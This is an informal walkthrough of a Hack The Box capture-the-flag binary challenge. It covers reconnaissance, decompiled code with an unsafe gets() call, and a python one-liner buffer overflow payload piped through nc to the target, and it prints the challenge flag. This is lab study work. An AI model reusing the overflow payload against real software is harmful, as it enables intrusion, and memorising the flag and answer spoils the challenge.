You know 0xDiablos

TARGET: 178.128.47.199:30088

HOST: 10.0.2.15

3KB

You know 0xDiablos.zip

archive

15KB

vuln

ZIP PASSWORD: hackthebox

SHA256:

307744fa0ae574756157a4607e307492141fdf1f000f6289eab4a8741729469c

• Start by downloading the zip.

  • On Windows you have to use 7Zip to extract the file from the zip.

  • On Linux you have to use 7zip as well.

7z x "You know 0xDiablos.zip"

• I now have a binary file to mess with called vuln.

cat vuln

• The first bit mentions a libc so it's a good chance we are dealing with some C programming language here but most of the rest is nonsense.

• The end looks like some syntax. I'll try strings next

strings vuln

• Looks like I got quite a bit more including some references to the flag and to try it on the server side. So let's give that a try.

tdX 
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
exit
fopen
puts
printf
fgets
stdout
setresgid
getegid
setvbuf
__libc_start_main
GLIBC_2.1
GLIBC_2.0
__gmon_start__
[^_]
flag.txt
Hurry up and try in on server side.
You know who are 0xDiablos: 
;*2$" 
GCC: (Debian 8.3.0-19) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.6887
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
vuln.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
__x86.get_pc_thunk.bx
printf@@GLIBC_2.0
__x86.get_pc_thunk.bp
vuln
fgets@@GLIBC_2.0
_edata
getegid@@GLIBC_2.0
__data_start
puts@@GLIBC_2.0
__gmon_start__
exit@@GLIBC_2.0
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
setvbuf@@GLIBC_2.0
fopen@@GLIBC_2.1
_dl_relocate_static_pie
_fp_hw
stdout@@GLIBC_2.0
__bss_start
main
__TMC_END__
setresgid@@GLIBC_2.0
flag
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got
.got.plt
.data
.bss
.comment

• I'll bounce over to the IP they gave me.

• I don't get a whole lot. It looks like I get straight text back. I'll try curling it.

curl [Target IP]:[Target Port] --verbose --http0.9

• I had to get creative to get the curl command to work but it looks like I get the same thing. Let's try scanning it with NMAP.

nmap -p [Target Port] [Target IP] -Pn

• Let's run a more thorough scan.

nmap -p [Target Port] [Target IP] -Pn -A

• Not a whole lot but it seems like the port is definitely open. Let's try something else. How about telnet?

telnet [Target IP] [Target Port]

• Pressing enter or putting in another password doesn't get me anywhere.

• I tried capturing a response with Burp but that wasn't getting me anywhere.

• Let's go back to the vuln file.

• I ran it through hexeditor to see what the file type is.

hexeditor vuln

• I get the following magic numbers back which is associated with an ELF file.

7F 45 4C 46

• Since I now know it is an ELF executable we can see if we can run it on our system.

./vuln

• It looks like it takes an input but doesn't do anything except escape. Let's go back to the strings output and see if we can make sense of what is going on.

• It looks like it imports some C libraries, talks about the flag.txt file, then possibly compiles and executes some code.

• Let's boot it up in Ghidra and take a look at what we got.

  • Use this link for a video on downloading and installing Ghidra. It can be found in the /opt/ghidraRun directory.

cd /opt/ghidra_10.2.3_PUBLIC
./ghidraRun

• Import the vuln file into ghidra and let's take a look at it.

• Unfortunately, I'm not good enough with Ghidra at the moment to really understand what is going on here. I searched for flag and found quite a few references but nothing that stood out.

• After some searching I found a tool called readelf that can break down an ELF file.

readelf -a vuln

• Lots of good info but like Ghidra a lot of it not helpful to me.

• I ended up looking up a walkthrough as I was out of tricks.

• They used Ghidra as well to analyze the code. Apparently the executable is susceptible to buffer overflow.

• 

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */

void vuln(void)

{
  char local_bc [180];
  
  gets(local_bc);
  puts(local_bc);
  return;
}

• Based on the gets(local_bc); part of the code this does not limit the number of characters we can input.

• You can see that the variable local_bc is set to 180 characters.

  • Assuming "local_bc" is a variable name, "gets(local_bc)" would mean that the line of input read from the standard input is stored in the variable "local_bc". However, it's worth noting that the "gets" function is considered unsafe and should not be used in modern C programming due to potential buffer overflow vulnerabilities. Instead, the "fgets" function is recommended as a safer alternative.

  • ChatGPT states that gets() should not be used due to vulnerability risks as it does not limit the number of characters that can be inputted. You should use fgets() as you have the option to limit characters with this function.

• Next, I'll use a new tool I have not used before called checksec which is a security tool to check binaries and executables for security flaws. See this link for more info.

checksec --file=./vuln

• This shows that the executable is vulnerable to multiple issues.

• Using checksec, we are able to see that the program does not have any stack cookies, allowing us to overwrite the return address. There is also no ASLR since PIE is not set, thus, we can overwrite a specific address into the RETURN address’s location.

• We can try this out by printing a lot of A's in the dialogue box to see what happens.

• The next tool I'll use is GDB which is a debugger. Use the below to install it if not already there.

 sudo apt-get install libc6-dbg gdb valgrind 

• Run the executable through GDB:

gdb ./vuln
r
^C
info file

• At the end there you can see the Entry point: 0x80490d0 memory address. Let's go take a look at that in Ghidra.

• 
• Long story but you have to initiate a buffer overflow and pipe it to the given IP Address.

python -c "print('A'*188 + '\xe2\x91\x04\x08'+'A'*4+'\xef\xbe\xad\xde\r\xd0\xde\xc0')" | nc [Target IP] [Target Port]

• This didn't work as I wasn't understanding the exact means to getting the stack to overflow.

• I'll have to review this material at a later date for the time being I'm going to keep moving on.

• A few of the write ups I read had multiple ways of getting here but none did a very good job explaining. Here is the answer from one of them.

• This was a kick in the balls from the last lab I did.

HTB{0ur_Buff3r_1s_not_healthy}